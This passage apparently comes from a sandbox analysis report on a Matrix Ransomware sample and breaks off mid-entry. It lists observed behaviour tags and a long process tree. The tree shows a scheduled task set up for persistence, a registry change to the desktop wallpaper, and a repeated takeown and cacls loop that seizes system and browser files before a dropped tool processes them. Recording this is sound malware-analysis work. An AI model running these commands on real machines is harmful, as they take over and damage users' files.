PID 2432 wrote to memory of 8832	2432	cmd.exe	461
PID 2432 wrote to memory of 8832	2432	cmd.exe	461
PID 2432 wrote to memory of 7680	2432	cmd.exe	459
PID 2432 wrote to memory of 7680	2432	cmd.exe	459
PID 2432 wrote to memory of 7796	2432	cmd.exe	118
PID 2432 wrote to memory of 7796	2432	cmd.exe	118
PID 2432 wrote to memory of 7864	2432	cmd.exe	119
PID 2432 wrote to memory of 7864	2432	cmd.exe	119
PID 4260 wrote to memory of 7956	4260	MatrixRansomware.exe	120
PID 4260 wrote to memory of 7956	4260	MatrixRansomware.exe	120
PID 4260 wrote to memory of 7956	4260	MatrixRansomware.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe
"C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4260
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe" "C:\Users\Admin\AppData\Local\Temp\NWhc4uOm.exe"
  2⤵
  PID:5644
- C:\Users\Admin\AppData\Local\Temp\NWhc4uOm.exe
  "C:\Users\Admin\AppData\Local\Temp\NWhc4uOm.exe" -n
  2⤵
  - Executes dropped EXE
  PID:3276
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\c9VRSLTg.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\c9VRSLTg.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:3352
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - Matrix Ransomware
    PID:6140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Ib2AajgE.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3416
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Ib2AajgE.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\FDxQbIBe.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2388
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\FDxQbIBe.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8368
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5036
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:8292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:7844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:7328
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:7352
    - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx164.exe
        
        WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:7512
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:7956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:8068
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\DDF.sys""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\DDF.sys" /E /G Admin:F /C
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\DDF.sys"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "DDF.sys" -nobanner
    3⤵
    PID:4624
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "DDF.sys" -nobanner
      4⤵
      Executes dropped EXE
      PID:2284
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:7820
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6092
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3440
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:4572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:6628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:6608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:4984
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:5088
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:7196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:8212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:8324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:8360
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:3736
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:9020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\ga.pak.DATA""
  2⤵
  PID:4184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\ga.pak.DATA" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\ga.pak.DATA"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ga.pak.DATA" -nobanner
    3⤵
    PID:7396
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ga.pak.DATA" -nobanner
      4⤵
      Executes dropped EXE
      PID:2440
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\it.pak""
  2⤵
  PID:7296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\it.pak" /E /G Admin:F /C
    3⤵
    PID:7488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\it.pak"
    3⤵
    PID:7516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "it.pak" -nobanner
    3⤵
    PID:3200
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "it.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:2316
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\lt.pak.DATA""
  2⤵
  PID:8012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\lt.pak.DATA" /E /G Admin:F /C
    3⤵
    PID:6596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\lt.pak.DATA"
    3⤵
    - Modifies file permissions
    PID:6644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "lt.pak.DATA" -nobanner
    3⤵
    PID:4188
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "lt.pak.DATA" -nobanner
      4⤵
      Executes dropped EXE
      PID:7044
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\nl.pak""
  2⤵
  PID:8280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\nl.pak" /E /G Admin:F /C
    3⤵
    PID:9012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\nl.pak"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "nl.pak" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "nl.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:2652
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\sk.pak.DATA""
  2⤵
  PID:8316
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\sk.pak.DATA" /E /G Admin:F /C
    3⤵
    PID:6820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\sk.pak.DATA"
    3⤵
    PID:6184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "sk.pak.DATA" -nobanner
    3⤵
    PID:5036
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "sk.pak.DATA" -nobanner
      4⤵
      Executes dropped EXE
      PID:4896
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\tr.pak""
  2⤵
  PID:7112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\tr.pak" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\tr.pak"
    3⤵
    PID:6508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "tr.pak" -nobanner
    3⤵
    PID:7236
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "tr.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:7428
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:6624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6716
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:6800
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:6956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:7068
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:7080
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:2940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5748
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5576
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:4920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:8036
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5244
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\es-419.pak""
  2⤵
  PID:5732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\es-419.pak" /E /G Admin:F /C
    3⤵
    PID:7556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\es-419.pak"
    3⤵
    - Modifies file permissions
    PID:6560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "es-419.pak" -nobanner
    3⤵
    PID:6196
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "es-419.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:7212
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\gd.pak""
  2⤵
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\gd.pak" /E /G Admin:F /C
    3⤵
    PID:7524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\gd.pak"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "gd.pak" -nobanner
    3⤵
    PID:7708
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "gd.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:7704
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\ja.pak""
  2⤵
  PID:1852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\ja.pak" /E /G Admin:F /C
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\ja.pak"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ja.pak" -nobanner
    3⤵
    PID:7564
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ja.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:4548
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\lv.pak""
  2⤵
  PID:5592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\lv.pak" /E /G Admin:F /C
    3⤵
    PID:8112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\lv.pak"
    3⤵
    PID:8132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "lv.pak" -nobanner
    3⤵
    PID:8156
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "lv.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:8176
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\nn.pak""
  2⤵
  PID:5284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\nn.pak" /E /G Admin:F /C
    3⤵
    PID:6816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\nn.pak"
    3⤵
    PID:8852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "nn.pak" -nobanner
    3⤵
    PID:2612
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "nn.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:5228
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
